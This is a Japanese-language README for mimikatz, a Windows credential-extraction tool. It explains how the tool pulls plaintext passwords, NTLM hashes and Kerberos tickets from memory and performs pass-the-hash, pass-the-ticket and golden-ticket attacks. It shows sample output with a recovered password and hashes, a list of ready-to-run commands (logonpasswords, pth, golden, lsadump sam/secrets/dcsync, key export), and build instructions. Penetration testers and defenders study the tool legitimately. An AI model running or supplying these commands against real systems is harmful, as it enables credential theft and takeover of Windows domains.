
mimikatz は、C を学び、Windows セキュリティに関するいくつかの実験を行うために私が作ったツールです。
メモリから平文パスワード、ハッシュ、PIN コード、Kerberos チケットを抽出することでよく知られています。mimikatz は、pass-the-hash、pass-the-ticket の実行や ゴールデンチケット の作成も可能です。
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
しかし、それだけではありません!Crypto、Terminal Server、Events、... 多くの情報が GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki または http://blog.gentilkiwi.com (フランス語、そうです) にあります。
ビルドしたくない場合は、バイナリが https://github.com/gentilkiwi/mimikatz/releases で入手できます。
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz は Visual Studio ソリューションと WinDDK ドライバー (主要な操作には任意) の形式になっているため、前提条件は次のとおりです:
mimikatz と mimilib の場合: Visual Studio 2010、2012、または 2013 for Desktop (2013 Express for Desktop は無料で、x86 & x64 をサポート - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz ドライバー、mimilove (および ddk2003 プラットフォーム) の場合: Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz はソース管理に SVN を使用していますが、現在は GIT でも利用できます!
同期には任意のツールを使用できます。Visual Studio 2013 に組み込まれた GIT も使用できます =)
Build / Build Solution を実行します (アーキテクチャを変更できます)mimikatz がビルドされ、使用できる状態になります! (Win32 / x64、運が良ければ ARM64 も)
_build_.cmd と mimidrv に関してエラー MSB3073 が発生する場合があります。これは、Windows Driver Kit 7.1 (WinDDK) がないとドライバーをビルドできないためですが、mimikatz と mimilib は問題ありません。このオプションの MSBuild プラットフォームを使用すると、WinDDK ビルドツールとデフォルトの msvcrt ランタイムを使用できます (バイナリが小さくなり、依存関係がありません)
このオプションのプラットフォームでは、後で Visual Studio 2012 または 2013 を使用する予定の場合でも、Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 と Visual Studio 2010 が必須です。
次の手順に従ってください:
CC BY 4.0 ライセンス - https://creativecommons.org/licenses/by/4.0/
mimikatz の開発にはコーヒーが必要です:
gentilkiwi。Twitter ( @gentilkiwi ) またはメール ( benjamin [at] gentilkiwi.com ) で連絡できます。lsadump モジュールの DCSync および DCShadow 機能は Vincent LE TOUX と共同執筆しました。彼にはメール ( vincent.letoux [at] gmail.com ) で連絡するか、彼のウェブサイト ( http://www.mysmartlogon.com ) を訪れてください。これは 個人 の開発です。その哲学を尊重し、悪い目的に使用しないでください!